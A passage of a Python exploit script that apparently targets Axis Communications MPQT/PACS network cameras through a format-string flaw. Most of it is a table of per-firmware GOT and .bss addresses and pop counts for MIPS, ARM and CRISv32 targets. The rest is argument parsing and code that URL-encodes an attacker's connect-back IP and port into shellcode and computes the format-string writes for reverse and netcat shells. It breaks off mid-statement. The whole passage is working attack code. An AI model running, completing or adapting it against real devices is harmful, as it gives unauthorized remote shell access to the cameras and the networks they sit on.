POP's\r\n\t\t\t\t14,\t\t# 2nd POP's\r\n\t\t\t\t'axis',\t\t# Aligns injected code\r\n\t\t\t\t700,\t\t# How big buffer before shellcode\r\n\t\t\t\t'MIPSel'\t# Shellcode type\r\n\t\t],\r\n\r\n\t\t# MPQT\r\n\t\t'MIPS-5.75x': [\r\n\t\t\t\t0x41c498,\t# Adjust to GOT free() address\r\n\t\t\t\t0x41daf0,\t# .bss shellcode address\r\n\t\t\t\t3,\t\t# 1st POP's\r\n\t\t\t\t13,\t\t# 2nd POP's\r\n\t\t\t\t'axi',\t\t# Aligns injected code\r\n\t\t\t\t700,\t\t# How big buffer before shellcode\r\n\t\t\t\t'MIPSel'\t# Shellcode type\r\n\t\t],\r\n\r\n\t\t# Shared with MPQT and PACS\r\n\t\t'MIPS-5.8x': [\r\n\t\t\t\t0x41d0c0,\t# Adjust to GOT free() address\r\n\t\t\t\t0x41e740,\t# .bss shellcode address\r\n\t\t\t\t3,\t\t# 1st POP's\r\n\t\t\t\t13,\t\t# 2nd POP's\r\n\t\t\t\t'axi',\t\t# Aligns injected code\r\n\t\t\t\t700,\t\t# How big buffer before shellcode\r\n\t\t\t\t'MIPSel'\t# Shellcode type\r\n\t\t],\r\n\r\n\t\t# MPQT\r\n\t\t'MIPS-5.9x': [ \r\n\t\t\t\t0x41d0c0,\t# Adjust to GOT free() address\r\n\t\t\t\t0x41e750,\t# .bss shellcode address\r\n\t\t\t\t3,\t\t# 1st POP's\r\n\t\t\t\t13,\t\t# 2nd POP's\r\n\t\t\t\t'axi',\t\t# Aligns injected code\r\n\t\t\t\t700,\t\t# How big buffer before shellcode\r\n\t\t\t\t'MIPSel'\t# Shellcode type\r\n\t\t],\r\n\r\n\t\t# MPQT\r\n\t\t'MIPS-6.1x': [\r\n\t\t\t\t0x41c480,\t# Adjust to GOT free() address\r\n\t\t\t\t0x41dac0,\t# .bss shellcode address\r\n\t\t\t\t3,\t\t# 1st POP's\r\n\t\t\t\t13,\t\t# 2nd POP's\r\n\t\t\t\t'axi',\t\t# Aligns injected code\r\n\t\t\t\t700,\t\t# How big buffer before shellcode\r\n\t\t\t\t'MIPSel'\t# Shellcode type\r\n\t\t],\r\n\r\n\t\t# MPQT\r\n\t\t'MIPS-6.2x': [\r\n\t\t\t\t0x41e578,\t# Adjust to GOT free() address\r\n\t\t\t\t0x41fae0,\t# .bss shellcode address\r\n\t\t\t\t2,\t\t# 1st POP's\r\n\t\t\t\t2,\t\t# 2nd POP's\r\n\t\t\t\t'axi',\t\t# Aligns injected code\r\n\t\t\t\t700,\t\t# How big buffer before shellcode\r\n\t\t\t\t'MIPSel'\t# Shellcode type\r\n\t\t],\r\n\r\n\t\t# MPQT\r\n\t\t'MIPS-6.20x': [\r\n\t\t\t\t0x41d0c4,\t# Adjust to GOT free() address\r\n\t\t\t\t0x41e700,\t# .bss shellcode address\r\n\t\t\t\t3,\t\t# 1st POP's\r\n\t\t\t\t13,\t\t# 2nd POP's\r\n\t\t\t\t'axi',\t\t# Aligns injected code\r\n\t\t\t\t700,\t\t# How big buffer before shellcode\r\n\t\t\t\t'MIPSel'\t# Shellcode type\r\n\t\t],\r\n\r\n\t\t# PACS\r\n\t\t'MIPS-1.3x': [\r\n\t\t\t\t0x41e4cc,\t# Adjust to GOT free() address\r\n\t\t\t\t0x420a78,\t# .bss shellcode address\r\n\t\t\t\t7,\t\t# 1st POP's\r\n\t\t\t\t11,\t\t# 2nd POP's\r\n\t\t\t\t'axis',\t\t# Aligns injected code\r\n\t\t\t\t700,\t\t# How big buffer before shellcode\r\n\t\t\t\t'MIPSel'\t# Shellcode type\r\n\t\t],\r\n\r\n\t\t# PACS\r\n\t\t'MIPS-1.1x': [\r\n\t\t\t\t0x41e268,\t# Adjust to GOT free() address\r\n\t\t\t\t0x420818,\t# .bss shellcode address\r\n\t\t\t\t7,\t\t# 1st POP's\r\n\t\t\t\t11,\t\t# 2nd POP's\r\n\t\t\t\t'axis',\t\t# Aligns injected code\r\n\t\t\t\t700,\t\t# How big buffer before shellcode\r\n\t\t\t\t'MIPSel'\t# Shellcode type\r\n\t\t],\r\n\r\n#\r\n# Tested with execstack to set executable stack flag bit on bin's and lib's\r\n#\r\n# These two 'Old Style' are not used in the exploit, but kept here as reference as they has been confirmed working.\r\n#\r\n\r\n\t\t# ARMel with bin/libs executable stack flag set with 'execstack'\r\n\t\t# MPQT\r\n\t\t'ARM-5.50x': [\t\t\t# \r\n\t\t\t\t0x1c1b4,\t# Adjust to GOT free() address\r\n\t\t\t\t0x1e7c8,\t# .bss shellcode address\r\n\t\t\t\t93,\t\t# 1st POP's\r\n\t\t\t\t1,\t\t# 2nd POP's\r\n\t\t\t\t'axis',\t\t# Aligns injected code\r\n\t\t\t\t700,\t\t# How big buffer before shellcode\r\n\t\t\t\t'ARMel'\t\t# Shellcode type (ARMel)\r\n\t\t],\r\n\r\n\t\t# ARMel with bin/libs executable stack flag set with 'execstack'\r\n\t\t# MPQT\r\n\t\t'ARM-5.55x': [\t\t\t# \r\n\t\t\t\t0x1c15c,\t# Adjust to GOT free() address\r\n\t\t\t\t0x1e834,\t# .bss shellcode address\r\n\t\t\t\t59,\t\t# 1st POP's\r\n\t\t\t\t80,\t\t# 2nd POP's\r\n\t\t\t\t'axis',\t\t# Aligns injected code\r\n\t\t\t\t800,\t\t# How big buffer before shellcode\r\n\t\t\t\t'ARMel'\t\t# Shellcode type (ARMel)\r\n\t\t],\r\n\r\n#\r\n# Using direct parameter access format string, AKA 'New Style'\r\n#\r\n\t\t# MPQT\r\n\t\t'ARM-NCSH-5.20x': [\t\t# AXIS P1311 5.20 (id=root)\r\n\t\t\t\t0x1c1b4,\t# Adjust to GOT free() address\r\n\t\t\t\t0x10178,\t# Adjust to \"/bin/sh -c; pipe(); vfork(); execve()\"\r\n\t\t\t\t61,\t\t# 1st POP's\r\n\t\t\t\t115,\t\t# 2nd POP's\r\n\t\t\t\t143,\t\t# 3rd POP's\r\n\t\t\t\t118,\t\t# 4th POP's\r\n\t\t\t\t'NCSH2'\t\t# Shellcode type (Netcat Shell)\r\n\t\t],\r\n\r\n\t\t# MPQT\r\n\t\t'ARM-NCSH-5.2x': [\t\t# \r\n\t\t\t\t0x1c1b4,\t# Adjust to GOT free() address\r\n\t\t\t\t0x1013c,\t# Adjust to \"/bin/sh -c; pipe(); vfork(); execve()\"\r\n\t\t\t\t61,\t\t# 1st POP's\r\n\t\t\t\t115,\t\t# 2nd POP's\r\n\t\t\t\t143,\t\t# 3rd POP's\r\n\t\t\t\t118,\t\t# 4th POP's\r\n\t\t\t\t'NCSH2'\t\t# Shellcode type (Netcat Shell)\r\n\t\t],\r\n\r\n\t\t# MPQT\r\n\t\t'ARM-NCSH-5.4x': [\t\t# \r\n\t\t\t\t0x1c1b4,\t# Adjust to GOT free() address\r\n\t\t\t\t0x101fc,\t# Adjust to \"/bin/sh -c; pipe(); vfork(); execve()\"\r\n\t\t\t\t61,\t\t# 1st POP's\r\n\t\t\t\t115,\t\t# 2nd POP's\r\n\t\t\t\t143,\t\t# 3rd POP's\r\n\t\t\t\t118,\t\t# 4th POP's\r\n\t\t\t\t'NCSH2'\t\t# Shellcode type (Netcat Shell)\r\n\t\t],\r\n#\r\n# Using POP format string, AKA 'Old Style'\r\n#\r\n\r\n\t\t# MPQT\r\n\t\t'ARM-NCSH-5.5x': [\t\t# \r\n\t\t\t\t0x1c15c,\t# Adjust to GOT free() address\r\n\t\t\t\t0xfdcc,\t\t# Adjust to \"/bin/sh -c; pipe(); vfork(); execve()\"\r\n\t\t\t\t97,\t\t# 1st POP's\r\n\t\t\t\t0,\t\t# 2nd POP's\r\n\t\t\t\t41,\t\t# 3rd POP's\r\n\t\t\t\t0,\t\t# 4th POP's\r\n\t\t\t\t'NCSH1'\t\t# Shellcode type (Netcat Shell)\r\n\t\t],\r\n\r\n\t\t# MPQT\r\n\t\t'ARM-NCSH-5.6x': [\t\t# \r\n\t\t\t\t0x1c15c,\t# Adjust to GOT free() address\r\n\t\t\t\t0xfcec,\t\t# Adjust to \"/bin/sh -c; pipe(); vfork(); execve()\"\r\n\t\t\t\t97,\t\t# 1st POP's\r\n\t\t\t\t0,\t\t# 2nd POP's\r\n\t\t\t\t41,\t\t# 3rd POP's\r\n\t\t\t\t0,\t\t# 4th POP's\r\n\t\t\t\t'NCSH1'\t\t# Shellcode type (Netcat Shell)\r\n\t\t],\r\n\r\n\t\t# MPQT\r\n\t\t'ARM-NCSH-5.7x': [\t\t# \r\n\t\t\t\t0x1c1c0,\t# Adjust to GOT free() address\r\n\t\t\t\t0xf800,\t\t# Adjust to \"/bin/sh -c; pipe(); vfork(); execve()\"\r\n\t\t\t\t132,\t\t# 1st POP's\r\n\t\t\t\t0,\t\t# 2nd POP's\r\n\t\t\t\t34,\t\t# 3rd POP's\r\n\t\t\t\t0,\t\t# 4th POP's\r\n\t\t\t\t'NCSH1'\t\t# Shellcode type (Netcat Shell)\r\n\t\t],\r\n\r\n\t\t# Will go in endless loop after exit of nc shell... DoS sux\r\n\t\t# MPQT\r\n\t\t'ARM-NCSH-5.8x': [\t\t# \r\n\t\t\t\t0x1b39c,\t# Adjust to GOT free() address\r\n\t\t\t\t0xf8c0,\t\t# Adjust to \"/bin/sh -c; pipe(); vfork(); execve()\"\r\n\t\t\t\t98,\t\t# 1st POP's\r\n\t\t\t\t0,\t\t# 2nd POP's\r\n\t\t\t\t34,\t\t# 3rd POP's\r\n\t\t\t\t1,\t\t# 4th POP's\r\n\t\t\t\t'NCSH1'\t\t# Shellcode type (Netcat Shell)\r\n\t\t],\r\n\r\n\t\t# MPQT\r\n\t\t'ARM-NCSH-6.1x': [\t\t# \r\n\t\t\t\t0x1d2a4,\t# Adjust to GOT free() address\r\n#\t\t\t\t0xecc4,\t\t# Adjust to \"/bin/sh -c; pipe(); vfork(); execve()\"\r\n\t\t\t\t0xecc8,\t\t# Adjust to \"/bin/sh -c; pipe(); vfork(); execve()\"\r\n\t\t\t\t106,\t\t# 1st POP's\r\n\t\t\t\t0,\t\t# 2nd POP's\r\n\t\t\t\t34,\t\t# 3rd POP's\r\n\t\t\t\t1,\t\t# 4th POP's\r\n\t\t\t\t'NCSH1'\t\t# Shellcode type (Netcat Shell)\r\n\t\t],\r\n#\r\n# Using POP format string, AKA 'Old Style'\r\n#\r\n\r\n\t\t# MPQT\r\n\t\t'CRISv32-5.5x': [\t\t# \r\n\t\t\t\t0x8d148,\t# Adjust to GOT free() address\r\n\t\t\t\t0x8f5a8,\t# .bss shellcode address\r\n\t\t\t\t4,\t\t# 1st POP's\r\n\t\t\t\t13,\t\t# 2nd POP's\r\n\t\t\t\t'axis',\t\t# Aligns injected code\r\n\t\t\t\t470,\t\t# How big buffer before shellcode\r\n\t\t\t\t'CRISv32'\t# Shellcode type (Crisv32)\r\n\t\t],\r\n\r\n\t\t# MPQT\r\n\t\t'CRISv32-5.4x': [\t\t# \r\n\t\t\t\t0x8d0e0,\t# Adjust to GOT free() address\r\n\t\t\t\t0x8f542,\t# .bss shellcode address\r\n\t\t\t\t4,\t\t# 1st POP's\r\n\t\t\t\t13,\t\t# 2nd POP's\r\n\t\t\t\t'axis',\t\t# Aligns injected code\r\n\t\t\t\t470,\t\t# How big buffer before shellcode\r\n\t\t\t\t'CRISv32'\t# Shellcode type (Crisv32)\r\n\t\t],\r\n\r\n\t\t# MPQT\r\n\t\t'CRISv32-5.2x': [\t\t# \r\n\t\t\t\t0x8d0b4,\t# Adjust to GOT free() address\r\n\t\t\t\t0x8f4d6,\t# .bss shellcode address\r\n\t\t\t\t4,\t\t# 1st POP's\r\n\t\t\t\t13,\t\t# 2nd POP's\r\n\t\t\t\t'axis',\t\t# Aligns injected code\r\n\t\t\t\t470,\t\t# How big buffer before shellcode\r\n\t\t\t\t'CRISv32'\t# Shellcode type (Crisv32)\r\n\t\t],\r\n\r\n\t\t# MPQT\r\n\t\t'CRISv32-5.20.0': [\t\t# \r\n\t\t\t\t0x8d0e4,\t# Adjust to GOT free() address\r\n\t\t\t\t0x8f546,\t# .bss shellcode address\r\n\t\t\t\t4,\t\t# 1st POP's\r\n\t\t\t\t13,\t\t# 2nd POP's\r\n\t\t\t\t'axis',\t\t# Aligns injected code\r\n\t\t\t\t470,\t\t# How big buffer before shellcode\r\n\t\t\t\t'CRISv32'\t# Shellcode type (Crisv32)\r\n\t\t]\r\n\r\n\r\n\t}\r\n\r\n\t\tif self.target == 0:\r\n\t\t\treturn target_db\r\n\t\t\t\r\n\t\tif not self.target in target_db:\r\n\t\t\tprint \"[!] Unknown FMS key: %s!\" % self.target\r\n\t\t\tsys.exit(1)\r\n\t\r\n\t\tif self.verbose:\r\n\t\t\tprint \"[Verbose] Number of availible FMS keys:\",len(target_db)\r\n\r\n\t\treturn target_db\r\n\r\n\r\n#\r\n# Validate correctness of HOST, IP and PORT\r\n#\r\nclass Validate:\r\n\r\n\tdef __init__(self,verbose):\r\n\t\tself.verbose = verbose\r\n\r\n\t# Check if IP is valid\r\n\tdef CheckIP(self,IP):\r\n\t\tself.IP = IP\r\n\r\n\t\tip = self.IP.split('.')\r\n\t\tif len(ip) != 4:\r\n\t\t\treturn False\r\n\t\tfor tmp in ip:\r\n\t\t\tif not tmp.isdigit():\r\n\t\t\t\treturn False\r\n\t\ti = int(tmp)\r\n\t\tif i < 0 or i > 255:\r\n\t\t\treturn False\r\n\t\treturn True\r\n\r\n\t# Check if PORT is valid\r\n\tdef Port(self,PORT):\r\n\t\tself.PORT = PORT\r\n\r\n\t\tif int(self.PORT) < 1 or int(self.PORT) > 65535:\r\n\t\t\treturn False\r\n\t\telse:\r\n\t\t\treturn True\r\n\r\n\t# Check if HOST is valid\r\n\tdef Host(self,HOST):\r\n\t\tself.HOST = HOST\r\n\r\n\t\ttry:\r\n\t\t\t# Check valid IP\r\n\t\t\tsocket.inet_aton(self.HOST) # Will generate exeption if we try with FQDN or invalid IP\r\n\t\t\t# Or we check again if it is correct typed IP\r\n\t\t\tif self.CheckIP(self.HOST):\r\n\t\t\t\treturn self.HOST\r\n\t\t\telse:\r\n\t\t\t\treturn False\r\n\t\texcept socket.error as e:\r\n\t\t\t# Else check valid DNS name, and use the IP address\r\n\t\t\ttry:\r\n\t\t\t\tself.HOST = socket.gethostbyname(self.HOST)\r\n\t\t\t\treturn self.HOST\r\n\t\t\texcept socket.error as e:\r\n\t\t\t\treturn False\r\n\r\n\r\n\r\nif __name__ == '__main__':\r\n\r\n#\r\n# Help, info and pre-defined values\r\n#\t\r\n\tINFO = '[Axis Communications MPQT/PACS remote exploit 2016 bashis <mcw noemail eu>]'\r\n\tHTTP = \"http\"\r\n\tHTTPS = \"https\"\r\n\tproto = HTTP\r\n\tverbose = False\r\n\tnoexploit = False\r\n\tlhost = '192.168.0.1'\t# Default Local HOST\r\n\tlport = '31337'\t\t# Default Local PORT\r\n\trhost = '192.168.0.90'\t# Default Remote HOST\r\n\trport = '80'\t\t# Default Remote PORT\r\n\t# Not needed for the SSI exploit, here for possible future usage.\r\n#\tcreds = 'root:pass'\r\n\tcreds = False\r\n\r\n#\r\n# Try to parse all arguments\r\n#\r\n\ttry:\r\n\t\targ_parser = argparse.ArgumentParser(\r\n#\t\tprog=sys.argv[0],\r\n\t\tprog='axis-ssid-PoC.py',\r\n description=('[*]' + INFO + '\\n'))\r\n\t\targ_parser.add_argument('--rhost', required=False, help='Remote Target Address (IP/FQDN) [Default: '+ rhost +']')\r\n\t\targ_parser.add_argument('--rport', required=False, help='Remote Target HTTP/HTTPS Port [Default: '+ rport +']')\r\n\t\targ_parser.add_argument('--lhost', required=False, help='Connect Back Address (IP/FQDN) [Default: '+ lhost +']')\r\n\t\targ_parser.add_argument('--lport', required=False, help='Connect Back Port [Default: '+ lport + ']')\r\n\t\targ_parser.add_argument('--fms', required=False, help='Manual FMS key')\r\n\t\tif creds:\r\n\t\t\targ_parser.add_argument('--auth', required=False, help='Basic Authentication [Default: '+ creds + ']')\r\n\t\targ_parser.add_argument('--https', required=False, default=False, action='store_true', help='Use HTTPS for remote connection [Default: HTTP]')\r\n\t\targ_parser.add_argument('-v','--verbose', required=False, default=False, action='store_true', help='Verbose mode [Default: False]')\r\n\t\targ_parser.add_argument('--noexploit', required=False, default=False, action='store_true', help='Simple testmode; With --verbose testing all code without exploiting [Default: False]')\r\n\t\targ_parser.add_argument('--dict', required=False, default=False, action='store_true', help='Print FMS keys and stats from dictionary, additional details with --verbose')\r\n\t\targs = arg_parser.parse_args()\r\n\texcept Exception as e:\r\n\t\tprint INFO,\"\\nError: %s\\n\" % str(e)\r\n\t\tsys.exit(1)\r\n\r\n\t# We want at least one argument, so print out help\r\n\tif len(sys.argv) == 1:\r\n\t\targ_parser.parse_args(['-h'])\r\n\r\n\tprint \"\\n[*]\",INFO\r\n\r\n\tif args.verbose:\r\n\t\tverbose = args.verbose\r\n\r\n\t# Print out info from dictionary\r\n\tif args.dict:\r\n\t\ttarget = FMSdb(rhost,verbose).FMSkey(0)\r\n\t\tprint \"[db] Number of FMS keys:\",len(target)\r\n\r\n\t\t# Print out detailed info from dictionary\r\n\t\tif verbose:\r\n\r\n\t\t\tprint \"[db] Target details of FMS Keys availible for manual xploiting\"\r\n\t\t\tprint \"\\n[FMS Key]\\t[GOT Address]\\t[BinSh Address]\\t[POP1]\\t[POP2]\\t[POP3]\\t[POP4]\\t[Shellcode]\"\r\n\r\n\t\t\tfor tmp in range(0,len(target)):\r\n\t\t\t\tKey = sorted(target.keys())[tmp]\r\n\t\t\t\ttemp = re.split('[-]',Key)[0:10]\r\n\r\n\t\t\t\tif temp[1] == 'NCSH':\r\n\t\t\t\t\tprint Key,'\\t','0x{:08x}'.format(target[Key][0]),'\\t','0x{:08x}'.format(target[Key][1]),'\\t',target[Key][2],'\\t',target[Key][3],'\\t',target[Key][4],'\\t',target[Key][5],'\\t',target[Key][6]\r\n\r\n\t\t\tprint \"\\n[FMS Key]\\t[GOT Address]\\t[BSS Address]\\t[POP1]\\t[POP2]\\t[Align]\\t[Buf]\\t[Shellcode]\"\r\n\t\t\tfor tmp in range(0,len(target)):\r\n\t\t\t\tKey = sorted(target.keys())[tmp]\r\n\t\t\t\ttemp = re.split('[-]',Key)[0:10]\r\n\r\n\t\t\t\tif temp[1] != 'NCSH':\r\n\t\t\t\t\tprint Key,'\\t','0x{:08x}'.format(target[Key][0]),'\\t','0x{:08x}'.format(target[Key][1]),'\\t',target[Key][2],'\\t',target[Key][3],'\\t',len(target[Key][4]),'\\t',target[Key][5],'\\t',target[Key][6]\r\n\r\n\t\t\tprint \"\\n\"\r\n\t\telse:\r\n\t\t\tprint \"[db] Target FMS Keys availible for manual xploiting instead of using auto mode:\"\r\n\t\t\tKey = \"\"\r\n\t\t\tfor tmp in range(0,len(target)):\r\n\t\t\t\tKey += sorted(target.keys())[tmp]\r\n\t\t\t\tKey += ', '\r\n\t\t\tprint '\\n',Key,'\\n'\r\n\t\tsys.exit(0)\r\n\r\n#\r\n# Check validity, update if needed, of provided options\r\n#\r\n\tif args.https:\r\n\t\tproto = HTTPS\r\n\t\tif not args.rport:\r\n\t\t\trport = '443'\r\n\r\n\tif creds and args.auth:\r\n\t\tcreds = args.auth\r\n\r\n\tif args.noexploit:\r\n\t\tnoexploit = args.noexploit\r\n\r\n\tif args.rport:\r\n\t\trport = args.rport\r\n\r\n\tif args.rhost:\r\n\t\trhost = args.rhost\r\n\r\n\tif args.lport:\r\n\t\tlport = args.lport\r\n\r\n\tif args.lhost:\r\n\t\tlhost = args.lhost\r\n\r\n\t# Check if LPORT is valid\r\n\tif not Validate(verbose).Port(lport):\r\n\t\tprint \"[!] Invalid LPORT - Choose between 1 and 65535\"\r\n\t\tsys.exit(1)\r\n\r\n\t# Check if RPORT is valid\r\n\tif not Validate(verbose).Port(rport):\r\n\t\tprint \"[!] Invalid RPORT - Choose between 1 and 65535\"\r\n\t\tsys.exit(1)\r\n\r\n\t# Check if LHOST is valid IP or FQDN, get IP back\r\n\tlhost = Validate(verbose).Host(lhost)\r\n\tif not lhost:\r\n\t\tprint \"[!] Invalid LHOST\"\r\n\t\tsys.exit(1)\r\n\r\n\t# Check if RHOST is valid IP or FQDN, get IP back\r\n\trhost = Validate(verbose).Host(rhost)\r\n\tif not rhost:\r\n\t\tprint \"[!] Invalid RHOST\"\r\n\t\tsys.exit(1)\r\n\r\n\r\n#\r\n# Validation done, start print out stuff to the user\r\n#\r\n\tif noexploit:\r\n\t\tprint \"[i] Test mode selected, no exploiting...\"\r\n\tif args.https:\r\n\t\tprint \"[i] HTTPS / SSL Mode Selected\"\r\n\tprint \"[i] Remote target IP:\",rhost\r\n\tprint \"[i] Remote target PORT:\",rport\r\n\tprint \"[i] Connect back IP:\",lhost\r\n\tprint \"[i] Connect back PORT:\",lport\r\n\r\n\trhost = rhost + ':' + rport\r\n\r\n#\r\n# FMS key is required into this PoC\r\n#\r\n\tif not args.fms:\r\n\t\tprint \"[!] FMS key is required!\"\r\n\t\tsys.exit(1)\r\n\telse:\r\n\t\tKey = args.fms\r\n\t\tprint \"[i] Trying with FMS key:\",Key\r\n\r\n#\r\n# Prepare exploiting\r\n#\r\n\t# Look up the FMS key in dictionary and return pointer for FMS details to use\r\n\ttarget = FMSdb(rhost,verbose).FMSkey(Key)\r\n\r\n\tif target[Key][6] == 'NCSH1':\r\n\t\tNCSH1 = target[Key][6]\r\n\t\tNCSH2 = \"\"\r\n\telif target[Key][6] == 'NCSH2':\r\n\t\tNCSH2 = target[Key][6]\r\n\t\tNCSH1 = \"\"\r\n\telse:\r\n\t\tNCSH1 = \"\"\r\n\t\tNCSH2 = \"\"\r\n\t\r\n\tif Key == 'ARM-NCSH-5.8x':\r\n\t\tprint \"\\nExploit working, but will end up in endless loop after exiting remote NCSH\\nDoS sux, so I'm exiting before that shit....\\n\\n\"\r\n\t\tsys.exit(0)\r\n\r\n\tprint \"[i] Preparing shellcode:\",str(target[Key][6])\r\n\r\n\t# We don't use url encoded shellcode with Netcat shell\r\n\t# This is for MIPS/CRISv32 and ARM shellcode\r\n\tif not NCSH1 and not NCSH2:\r\n\t\tFMSdata = target[Key][4]\t\t# This entry aligns the injected shellcode\r\n\r\n\t\t# Building up the url encoded shellcode for sending to the target,\r\n\t\t# and replacing LHOST / LPORT in shellcode to choosen values\r\n\t\t\r\n\t\t# part of first 500 decoded bytes will be overwritten during stage #2, and since\r\n\t\t# there is different 'tailing' on the request internally, keep it little more than needed, to be safe.\r\n\t\t# Let it be 0x00, just for fun.\r\n\t\tFMSdata += '%00' * target[Key][5]\r\n\r\n\t\t# Connect back IP to url encoded\r\n\t\tip_hex = '%{:02x} %{:02x} %{:02x} %{:02x}'.format(*map(int, lhost.split('.')))\r\n\t\tip_hex = ip_hex.split()\r\n\t\tIP1=ip_hex[0];IP2=ip_hex[1];IP3=ip_hex[2];IP4=ip_hex[3];\r\n\r\n\t\t# Let's break apart the hex code of LPORT into two bytes\r\n\t\tport_hex = hex(int(lport))[2:]\r\n\t\tport_hex = port_hex.zfill(len(port_hex) + len(port_hex) % 2)\r\n\t\tport_hex = ' '.join(port_hex[i: i+2] for i in range(0, len(port_hex), 2))\r\n\t\tport_hex = port_hex.split()\r\n\t\r\n\t\tif (target[Key][6]) == 'MIPSel':\r\n\t\t\t# Connect back PORT\r\n\t\t\tif len(port_hex) == 1:\r\n\t\t\t\tPP1 = \"%ff\"\r\n\t\t\t\tPP0 = '%{:02x}'.format((int(port_hex[0],16)-1))\r\n\t\t\telif len(port_hex) == 2:\r\n\t\t\t\t# Little Endian\r\n\t\t\t\tPP1 = '%{:02x}'.format((int(port_hex[0],16)-1))\r\n\t\t\t\tPP0 = '%{:02x}'.format(int(port_hex[1],16))\r\n\t\telif (target[Key][6]) == 'ARMel': # Could be combinded with CRISv32\r\n\t\t\t# Connect back PORT\r\n\t\t\tif len(port_hex) == 1:\r\n\t\t\t\tPP1 = \"%00\"\r\n\t\t\t\tPP0 = '%{:02x}'.format(int(port_hex[0],16))\r\n\t\t\telif len(port_hex) == 2:\r\n\t\t\t\t# Little Endian\r\n\t\t\t\tPP1 = '%{:02x}'.format(int(port_hex[0],16))\r\n\t\t\t\tPP0 = '%{:02x}'.format(int(port_hex[1],16))\r\n\t\telif (target[Key][6]) == 'CRISv32':\r\n\t\t\t# Connect back PORT\r\n\t\t\tif len(port_hex) == 1:\r\n\t\t\t\tPP1 = \"%00\"\r\n\t\t\t\tPP0 = '%{:02x}'.format(int(port_hex[0],16))\r\n\t\t\telif len(port_hex) == 2:\r\n\t\t\t\t# Little Endian\r\n\t\t\t\tPP1 = '%{:02x}'.format(int(port_hex[0],16))\r\n\t\t\t\tPP0 = '%{:02x}'.format(int(port_hex[1],16))\r\n\t\telse:\r\n\t\t\tprint \"[!] Unknown shellcode! (%s)\" % str(target[Key][6])\r\n\t\t\tsys.exit(1)\r\n\r\n\t\t# Replace LHOST / LPORT in URL encoded shellcode\r\n\t\tshell = shellcode_db(rhost,verbose).sc(target[Key][6])\r\n\t\tshell = shell.replace(\"IP1\",IP1)\r\n\t\tshell = shell.replace(\"IP2\",IP2)\r\n\t\tshell = shell.replace(\"IP3\",IP3)\r\n\t\tshell = shell.replace(\"IP4\",IP4)\r\n\t\tshell = shell.replace(\"PP0\",PP0)\r\n\t\tshell = shell.replace(\"PP1\",PP1)\r\n\t\tFMSdata += shell\r\n\r\n#\r\n# Calculate the FMS values to be used\r\n#\r\n\t# Get pre-defined values\r\n\tALREADY_WRITTEN = 40\t# Already 'written' in the daemon before our FMS\r\n#\tPOP_SIZE = 8\r\n\tPOP_SIZE = 1\r\n\r\n\tGOThex = target[Key][0]\r\n\tBSShex = target[Key][1]\r\n\tGOTint = int(GOThex)\r\n\r\n\t# 'One-Write-Where-And-What'\r\n\tif not NCSH1 and not NCSH2:\r\n\r\n\t\tPOP1 = target[Key][2]\r\n\t\tPOP2 = target[Key][3]\r\n\r\n\t\t# Calculate for creating the FMS code\r\n\t\tALREADY_WRITTEN = ALREADY_WRITTEN + (POP1 * POP_SIZE)\r\n\t\tGOTint = (GOTint - ALREADY_WRITTEN)\r\n\t\r\n\t\tALREADY_WRITTEN = ALREADY_WRITTEN + (POP2 * POP_SIZE)\r\n\r\n\t\tBSSint = int(BSShex)\r\n\t\tBSSint = (BSSint - GOTint - ALREADY_WRITTEN)\r\n\r\n#\t\tif verbose:\r\n#\t\t\tprint \"[Verbose] Calculated GOTint:\",GOTint,\"Calculated BSSint:\",BSSint\r\n\r\n\t# 'Two-Write-Where-And-What' using \"New Style\"\r\n\telif NCSH2:\r\n\r\n\t\tPOP1 = target[Key][2]\r\n\t\tPOP2 = target[Key][3]\r\n\t\tPOP3 = target[Key][4]\r\n\t\tPOP4 = target[Key][5]\r\n \t\tPOP2_SIZE = 2\r\n\t\t\r\n \t\t# We need to count higher than provided address for the jump\r\n\t\tBaseAddr = 0x10000 + BSShex\r\n\t\r\n\t\t# Calculate for creating the FMS code\r\n\t\tGOTint = (GOTint - ALREADY_WRITTEN)\r\n\r\n\t\tALREADY_WRITTEN = ALREADY_WRITTEN + GOTint\r\n\t\t\r\n\t\t# Calculate FirstWhat value\r\n\t\tFirstWhat = BaseAddr - (ALREADY_WRITTEN)\r\n\t\t\r\n\t\tALREADY_WRITTEN = ALREADY_WRITTEN + FirstWhat\r\n\r\n\t\t# Calculate SecondWhat value, so it always is 0x20300\r\n\t\tSecondWhat = 0x20300 - (ALREADY_WRITTEN + POP2_SIZE)\r\n\r\n\t\tshell = shellcode_db(rhost,verbose).sc(target[Key][6])\r\n\t\tshell = shell.replace(\"LHOST\",lhost)\r\n\t\tshell = shell.replace(\"LPORT\",lport)\r\n\r\n\t\tFirstWhat = FirstWhat - len(shell)\r\n\r\n#\t\tif verbose:\r\n#\t\t\tprint \"[Verbose] Calculated GOTint:\",GOTint,\"Calculated FirstWhat:\",FirstWhat,\"Calculated SecondWhat:\",SecondWhat\r\n\t\r\n\t\r\n\t# 'Two-Write-Where-And-What' using \"Old Style\"\r\n\telif NCSH1:\r\n\r\n\t\tPOP1 = target[Key][2]\r\n\t\tPOP2 = target[Key][3]\r\n\t\tPOP3 = target[Key][4]\r\n\t\tPOP4 = target[Key][5]\r\n\t\tPOP2_SIZE = 2\r\n\r\n\t\t# FirstWhat writes with 4 bytes (Y) (0x0002YYYY)\r\n\t\t# SecondWhat writes with 1 byte (Z) (0x00ZZYYYY)\r\n\t\tif BSShex > 0x10000:\r\n\t\t\tMSB = 1\r\n\t\telse:\r\n\t\t\tMSB = 0\r\n\r\n \t\t# We need to count higher than provided address for the jump\r\n\t\tBaseAddr = 0x10000 + BSShex\r\n\r\n\t\t# Calculate for creating the FMS code\r\n\t\tALREADY_WRITTEN = ALREADY_WRITTEN + (POP1 * POP_SIZE)\r\n\t\t\r\n\t\tGOTint = (GOTint - ALREADY_WRITTEN)\r\n\t\t\r\n\t\tALREADY_WRITTEN = ALREADY_WRITTEN + GOTint + POP2_SIZE + (POP3 * POP_SIZE)\r\n\t\t\r\n\t\t# Calculate FirstWhat value\r\n\t\tFirstWhat = BaseAddr - (ALREADY_WRITTEN)\r\n\t\t\r\n\t\tALREADY_WRITTEN = ALREADY_WRITTEN + FirstWhat + (POP4 * POP_SIZE)\r\n\r\n\t\t# Calculate SecondWhat value, so it always is 0x203[00] or [01]\r\n\t\tSecondWhat = 0x20300 - (ALREADY_WRITTEN) + MSB\r\n\r\n\t\tshell = shellcode_db(rhost,verbose).sc(target[Key][6])\r\n\t\tshell = shell.replace(\"LHOST\",lhost)\r\n\t\tshell = shell.replace(\"LPORT\",lport)\r\n\r\n\t\tGOTint = GOTint - len(shell)\r\n\r\n#\t\tif 